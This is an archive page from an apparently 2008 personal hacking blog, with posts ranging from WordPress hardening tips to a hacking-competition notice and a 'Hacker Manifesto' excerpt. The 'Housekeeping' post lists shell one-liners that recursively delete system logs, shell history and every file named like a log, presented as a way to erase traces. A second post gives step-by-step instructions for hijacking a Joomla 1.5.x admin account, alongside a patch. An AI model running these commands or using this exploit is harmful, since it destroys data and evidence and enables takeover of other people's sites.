Archive for the 'Hacker' Category
Housekeeping
August 16th, 2008
rm -rf /var/log rm -rf /var/adm rm -rf /var/apache/log rm -rf $HISTFILE find / -name .bash_history -exec rm -rf {} \; find / -name .bash_logout -exec rm -rf {} \; find / -name log* -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \;
p/s : Use to delete your log at ur own risk..
Joomla 1.5.x Remote Admin Password Change
August 14th, 2008
####################################################
#### Joomla 1.5.x Remote Admin Password Change ####
####################################################
Bug : http://www.milw0rm.com/exploits/6234
Patch : click here
POC :
1. Go to url : www.target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field “token” char ‘ and Click OK.
3. Write new password for admin
4. Go to url : www.target.com/administrator/
5. Login admin with new password
Upgrade to latest Joomla! version (1.5.6 or newer)
0r
Add the following code to global $mainframe; on line 113 of reset.php
[sourcecode language='php']
if(strlen($token) != 32) {
$this->setError(JText::_(’INVALID_TOKEN’));
return false;
}
[/sourcecode]
XSS scanner by d3hydr8
July 19th, 2008
How to secure your wordpress blog
July 15th, 2008
- Use latest stable version of Wordpress. Don’t use beta version!
- Your database table prefix must be other than default prefix (wp_) - Securing against sql injection.
- Wordpress version must be hidden - Many hackers take this advantage to attack wordpress in version that vulnerable. So, let them know nothing.
- Must be no user “admin” - this should be guested during sql injection. If u used it.. change it now.
- Put .htaccess in yout /wp-admin/ directory. - avoid directory listing.
International Hacking Competition 2008 (i-Hack’08)
June 25th, 2008
Event
Basically there will be 10 programs that will be held in this event. There are:
1. Hacking Competition - Capture The Flag (CTF)
2. Hacking Competition - Computer Forensic Challenges
3. Hacking Competition - Defense Challenges
4. Hacking Competition - Malware Analysis Challenge
5. Student Computer Security Project Presentation
6. Computer Security Exhibition
7. Computer Security Forum
8. Computer Security Awareness Talk
9. Hack And Defense Workshop
10. Career Fair
click here for more information
A HACKER MANIFESTO [version 4.0]
June 12th, 2008
Manifestation
01. There is a double spooking the world, the double of abstraction. The fortunes of states and armies, companies and communities depend on it. All contending classes – the landlords and farmers, the workers and capitalists – revere yet fear the relentless abstraction of the world on which their fortunes yet depend. All the classes but one. The hacker class.
02. Whatever code we hack, be it programming language, poetic language, math or music, curves or colourings, we create the possibility of new things entering the world. Not always great things, or even good things, but new things. In art, in science, in philosophy and culture, in any production of knowledge where data can be gathered, where information can be extracted from it, and where in that information new possibilities for the world are produced, there are hackers hacking the new out of the old. While hackers create these new worlds, we do not possess them. That which we create is mortgaged to others, and to the interests of others, to states and corporations who control the means for making worlds we alone discover. We do not own what we produce – it owns us.03. And yet we don’t quite know who we are. While we recognise our distinctive existence as a group, as programmers, as artists or writers or scientists or musicians, we rarely see these ways of representing ourselves as mere fragments of a class experience that is still struggling to express itself as itself, as expressions of the process of producing abstraction in the world. Geeks and freaks become what they are negatively, through their exclusion by others. Hackers are a class, but an abstract class, a class as yet to hack itself into manifest existence as itself.
miNaH bLurr on 
